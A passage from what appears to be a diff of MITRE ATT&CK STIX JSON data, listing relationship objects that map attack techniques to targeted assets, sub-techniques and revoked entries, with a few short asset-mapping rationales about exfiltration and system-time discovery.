"3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46a7c513-525d-485b-b72b-41b778ab3ce3", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46b33aec-21e6-4a5d-b99d-6ce4396a16d8", + "created": "2020-10-01T00:49:05.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46c0157e-ca53-48aa-858a-b41fa6a8720e", + "created": "2024-05-23T04:09:45.279Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:43:22.957Z", + "description": "Asset Mapping Rationale: Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network.", + "relationship_type": "targets", + "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46c31831-b5b7-4e33-a9a2-2fb2f4ab29f8", + "created": "2020-03-19T19:10:25.629Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df", + "target_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46cee217-d1fd-4b15-8b76-527e147c377f", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46d28201-861e-40cb-8ca0-3af1298c8794", + "created": "2024-06-26T15:02:59.345Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:02:59.345Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46e4cdd2-e8f0-46aa-9264-868815a05af9", + "created": "2024-03-25T20:17:59.424Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-25T20:17:59.424Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46e7e907-f70d-43d0-b9f3-400d4f6e3adb", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46ea22c6-2242-4f0a-89f6-9d7fc08e503a", + "created": "2024-06-27T09:12:13.664Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:12:13.664Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46ffc356-2bdf-4be8-b8e1-198d55359465", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4700774f-a6f2-4b54-87e3-4991fc743267", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4712fa62-856c-424c-8d91-3ed30ed66ba1", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--47147596-eb97-4e58-a045-87d89d9d0cde", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--47217894-20a7-4fd7-a074-57acacf4b104", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--47277d62-4992-4f95-9ba3-5e534417936b", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--47432b52-498d-4098-b9aa-c46edbb4048b", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4768c731-3be9-44b8-a217-dfbececa57d9", + "created": "2023-09-29T18:06:22.868Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:06:22.868Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--47691042-75ca-47b6-a36e-e7f0a16539df", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--477641b2-05ac-4ab9-b758-a2d294189de4", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--479df002-ba5f-4ef8-b4ad-30361c16a081", + "created": "2024-06-27T08:49:45.011Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:49:45.011Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--47a29895-0ab3-4da3-9d4b-4731b88f80f6", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--47acf59d-7476-4794-b359-747da52f196c", + "created": "2020-02-11T18:28:45.055Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--47eff1ce-c9da-4b6d-a96c-5f4918f1a441", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4812b2d7-19ed-4d3d-a35b-4962eddb0cf2", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--482bf1f4-24f1-4874-9157-ff316704ca85", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--483719ad-c973-4210-b059-14e87dbd45f8", + "created": "2023-09-28T19:49:43.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:49:43.417Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--48399043-6579-4358-953f-4f2efe6a7933", + "created": "2024-06-27T09:32:59.833Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:32:59.833Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4840d312-579f-4330-b696-777e228c43ec", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--484a1a7a-9e4e-4815-85bd-82a7ea607f2d", + "created": "2020-03-19T15:11:39.887Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a", + "target_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--484b0873-59ef-41a3-b33d-b3fb41a2c957", + "created": "2024-04-09T20:50:34.946Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:50:34.946Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--484cc2a6-7ffe-48a9-90c1-c6856d3e1a60", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--48562a7a-c167-4116-8438-b9ebad6c22ef", + "created": "2024-05-22T17:27:28.301Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:44:32.115Z", + "description": "Asset Mapping Rationale: An adversary may gather the system time and/or time zone settings from a local or remote system. On network devices, Network Device CLI commands such as show clock detail can be used to see the current time configuration.", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--48715975-2a52-4959-a471-e4df658396b1", + "created": "2024-06-26T13:44:03.540Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:44:03.540Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4883d738-7773-45c4-8c40-0d7a292f119c", + "created": "2024-05-22T17:14:42.539Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:46:21.450Z", + "description": "Asset Mapping Rationale:", + "relationship_type": "targets", + "source_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4889c059-39e1-4d4f-8142-49db75271f64", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--488bc3c0-2570-4673-856f-fdec2ecd18b8", + "created": "2024-06-27T08:53:53.482Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:53:53.482Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--48939c1d-b5df-4f52-99c1-9674d90f75aa", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--48e4a5a8-b8e5-43f7-ae6d-f9565a4817dc", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--48f191ab-6e27-44cd-9de6-a0e06e58d983", + "created": "2020-03-14T23:39:50.313Z", + "created_by_ref": 